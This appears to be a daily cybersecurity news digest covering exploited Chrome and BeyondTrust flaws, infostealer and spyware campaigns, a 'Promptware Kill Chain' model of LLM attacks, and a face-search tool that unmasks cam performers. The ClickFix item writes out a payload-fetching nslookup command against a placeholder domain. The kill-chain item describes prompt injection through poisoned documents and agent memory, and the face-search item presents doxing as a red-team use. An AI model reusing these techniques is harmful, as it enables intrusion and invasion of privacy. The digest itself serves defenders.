Digital shields protecting against zero-day exploits, spyware, and new AI threats.

Daily Cybersecurity News - February 16, 2026

Google Patches Exploited Chrome Zero-Day

High

Executive Summary

Google has released an emergency update for Chrome to address CVE-2026-2441, a critical zero-day vulnerability currently under active exploitation. Unlike previous V8 engine flaws, this issue resides in the CSS (Cascading Style Sheets) engine, making it a distinct and highly volatile threat vector.

Vulnerability Details

  • Affected Product: Google Chrome versions prior to 145.0.7632.75 (Windows/macOS) and 144.0.7559.75 (Linux).
  • Identifier: CVE-2026-2441
  • CVSS Score: 8.8 (High)
  • Exploitation Status: Actively Exploited in the Wild.

Risk & Impact

  • Triage: Critical / Immediate.
  • Attack Vector: Use-After-Free (UAF) in the CSS engine. Attackers exploit a race condition where memory is freed but still referenced, allowing for heap corruption via a crafted HTML page.
  • Impact: Arbitrary Code Execution (ACE) within the renderer sandbox. Attackers are likely chaining this with a secondary escape vulnerability or using it for in-browser data theft.

Action Plan

  • Immediate Action: Update all Chrome instances to version 145.0.7632.75 or later immediately. Do not wait for scheduled patch cycles.
  • Scope: This flaw affects all Chromium-based browsers (Edge, Brave, Opera). Verify upstream patches for these applications specifically.

Relevant professional terms

Zero-Day Exploit
A cyberattack that takes advantage of a security vulnerability on the same day the vulnerability becomes known to the vendor, leaving them "zero days" to create a patch.
Out-of-Bounds Memory Access
A type of software vulnerability where a program reads or writes data outside the boundaries of an allocated memory buffer. This can lead to crashes, data corruption, or code execution.

Feds Race To Patch BeyondTrust Flaw

Critical

Executive Summary

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch a critical remote code execution vulnerability, CVE-2026-1731, in BeyondTrust products. This flaw is under active exploitation, prompting a three-day remediation deadline for government entities.

Vulnerability Details

  • Affected Product: BeyondTrust Remote Support (versions 25.3.1 and earlier) and Privileged Remote Access (versions 24.3.4 and earlier).
  • Identifier: CVE-2026-1731.
  • CVSS Score: 9.9 (Critical).
  • Exploitation Status: Actively Exploited.

Risk & Impact

  • Triage: Immediate patching is required due to active, widespread exploitation.
  • Attack Vector: An unauthenticated, remote attacker can send specially crafted requests to a vulnerable server, leading to OS command injection. No user interaction is required.
  • Ease of Exploit: Low. The vulnerability is easy to exploit and can lead to complete system compromise, unauthorized access, and data exfiltration.

Action Plan

  • Immediate Action: On-premise customers must manually install patches. Upgrade to Remote Support version 25.3.2 or later or Privileged Remote Access version 25.1 or later.
  • Workaround: All SaaS instances were automatically patched by BeyondTrust on February 2, 2026. No workaround is available for on-premise deployments; patching is mandatory.
  • Detection:
    • Network: Monitor for external requests to the /get_portal_info endpoint that return the internal x-ns-company identifier, followed by an immediate WebSocket upgrade request (Status Code 101).
    • Endpoint: Scan for the presence of SimpleHelp Remote Monitoring binaries in C:\ProgramData or /var/lib. Attackers are renaming these binaries (e.g., to remote access.exe) to blend in with legitimate administrative tools.

Relevant professional terms

CISA (Cybersecurity and Infrastructure Security Agency)
A U.S. federal agency responsible for improving cybersecurity and infrastructure protection across all levels of government, coordinating cybersecurity programs, and sharing threat information.
Remote Code Execution (RCE)
A class of software vulnerability that allows a malicious actor to execute arbitrary commands or code on a target machine or in a target process over a network.

ClickFix Abuses NSLookup For RAT Delivery

Executive Summary

Microsoft researchers identified a ClickFix social engineering campaign tricking users into executing malicious commands. The attack uses the legitimate 'nslookup' tool to perform a DNS query that retrieves and runs a second-stage payload, ultimately deploying a Remote Access Trojan (RAT).

Key TTPs

  • Initial Access: Phishing, malvertising, and compromised websites redirect users to pages with fake CAPTCHA or error messages.
  • Execution: Users are tricked into pasting a script into the Windows Run dialog or PowerShell. The script executes nslookup -q=txt [malicious-domain] to retrieve a Base64-encoded payload directly from a DNS TXT record. This "fileless" delivery method bypasses standard HTTP/HTTPS web filters.
  • Defense Evasion: The campaign uses a "Living off the Land" (LOLBin) technique by abusing nslookup, a legitimate Windows binary, to blend malicious traffic with normal DNS activity.

Campaign Analysis

This campaign marks an evolution in ClickFix tactics by using DNS as a command-and-control channel for payload delivery, making detection more difficult than traditional web-based downloads. This highlights a growing trend of threat actors abusing legitimate system tools to bypass security controls.

Targeting & Infrastructure

  • Target Profile: Campaigns have targeted thousands of organizations globally across various industries, including healthcare and hospitality.

Relevant Terms

  • Remote Access Trojan (RAT): Malicious software that grants an attacker remote administrative control over an infected computer.
  • Living off the Land (LOLBin): An attack technique using a system's own pre-installed tools and binaries to execute malicious activities, making threats harder to detect.
Source: Malwarebytes

Hackers Weaponize Google to Spread Infostealers

Executive Summary

Threat actors are exploiting thousands of malicious Google Groups and Google-hosted URLs to distribute the Lumma Stealer and a trojanized Ninja Browser. The campaign employs OS-based targeting: Windows users are served the Lumma Stealer (capable of reviving expired Google cookies), while Linux users receive a trojanized version of Ninja Browser.

Key TTPs

  • Initial Access: Abusing Google Groups and URLs for credibility and embedding malicious download links in posts.
  • Execution: On Windows, the malware reassembles binary files and executes a payload in memory. Linux users are tricked into downloading a trojanized browser.
  • Defense Evasion: The attack bypasses trust-based filtering by leveraging legitimate Google domains, increasing user confidence in the malicious content.

Campaign Analysis

This campaign highlights a significant trend of threat actors abusing legitimate SaaS platforms to bypass security controls and build credibility with victims. The scale, involving over 4,000 malicious Google Groups, demonstrates a sophisticated and widespread operation targeting users globally.

Targeting & Infrastructure

  • Target Profile: Windows and Linux users across various industries.
  • Infrastructure: Over 4,000 malicious Google Groups and 3,500 Google-hosted URLs are used to deliver the malware.

Relevant Terms

  • Infostealer: A type of malware designed to secretly gather sensitive information from a victim's computer, such as login credentials, financial data, and browser history.
  • Trojanized: A legitimate application or file that has been modified by attackers to include hidden malicious code, which executes when the user runs the software.

Mobile Spyware Enables Total Device Takeover

Executive Summary

A new commercial spyware called ZeroDayRAT is being sold on Telegram, giving attackers complete remote control of infected Android and iOS devices. The platform facilitates real-time surveillance, data exfiltration, and direct financial theft from banking and cryptocurrency applications.

Key TTPs

  • Initial Access: Delivered via smishing (SMS phishing), malicious links on messaging apps, or trojanized apps in fake app stores.
  • Execution: Exploits vulnerabilities in the OS kernel and accessibility services to gain privileged access. It uses overlay attacks to capture banking credentials and clipboard injection to redirect crypto transfers.
  • Defense Evasion: Employs dynamic code obfuscation and custom communication protocols to evade detection by mobile security solutions.

Campaign Analysis

ZeroDayRAT represents the commercialization of nation-state-level surveillance tools, making sophisticated mobile compromise capabilities accessible to a wider range of threat actors. Its cross-platform support and active development on Telegram suggest a growing and persistent threat to both individuals and organizations.

Targeting & Infrastructure

  • Target Profile: Users of Android (versions 5-16) and iOS (up to version 26) devices. The malware's ability to target the latest iOS version suggests the use of enterprise certificates or sophisticated sandbox escapes.
  • Infrastructure: A decentralized model where buyers self-host the control panel. The developer uses dedicated Telegram channels for sales, support, and updates.

Relevant Terms

  • Spyware: Malicious software designed to secretly gather information from a device and transmit it to an attacker.
  • RAT (Remote Access Trojan): A type of malware that provides an attacker with complete remote administrative control over an infected system.

New Kill Chain Redefines AI Threats

Executive Summary

The concept of "prompt injection" is dangerously insufficient for understanding modern AI threats. A new multi-stage framework, the "Promptware Kill Chain," has been proposed to model how attacks on LLMs now resemble traditional malware campaigns, moving from initial access to final objectives.

Key Findings

  • The proposed model outlines a five-to-seven stage attack lifecycle, including Initial Access, Privilege Escalation, Persistence, Lateral Movement, and Actions on Objective.
  • Initial access is not limited to direct user input; it includes indirect injection through poisoned documents, emails, or even images that an LLM might process.
  • Persistence is achieved by embedding malicious instructions into data stores or an AI agent's memory, allowing the threat to reactivate later.

The Bottom Line

This model forces a strategic shift from treating AI security as a simple input filtering problem to viewing LLM-powered applications as full-fledged execution environments. Technical leaders must now adapt traditional cybersecurity principles, such as defense-in-depth and least-privilege, to mitigate these complex, multi-stage threats and prevent attackers from moving laterally across interconnected systems.

Relevant Terms

  • Prompt Injection: An attack technique where a malicious user embeds hidden instructions within their input to an AI model, causing it to perform unintended actions.
  • Kill Chain: A cybersecurity framework that outlines the sequential stages of a cyberattack, from initial reconnaissance to the final goal.

Facial Recognition Tool Unmasks Streamers

Executive Summary

CamGirlFinder is a web-based tool that uses facial recognition to identify and link cam models across more than a dozen different streaming platforms. It allows users to upload an image of a person to find their profiles, effectively de-anonymizing individuals who may use different aliases on various sites.

Key Features

  • Facial Recognition Search: Upload an image to find matching faces across numerous cam sites.
  • Platform Aggregation: Scans major platforms like Chaturbate, BongaCams, and LiveJasmin.
  • Advanced Filtering: Allows users to narrow searches by preferences like age, language, and location.

Use Case (The "So What?")

This tool poses a significant risk to personal privacy and operational security. For Red Teams, it serves as a potent OSINT tool for doxing or social engineering campaigns by linking online personas. For Blue Teams and security awareness, it underscores the danger of biometric data exposure and the critical need for performers to understand the permanent risks of showing their face online.

Availability

Publicly available as a web-based search engine.

Relevant Terms

  • Facial Recognition: A technology that identifies a person by analyzing and comparing patterns based on their facial details.
  • OSINT: Open-Source Intelligence; data collected from publicly available sources for use in an intelligence context.
Source: 404 Media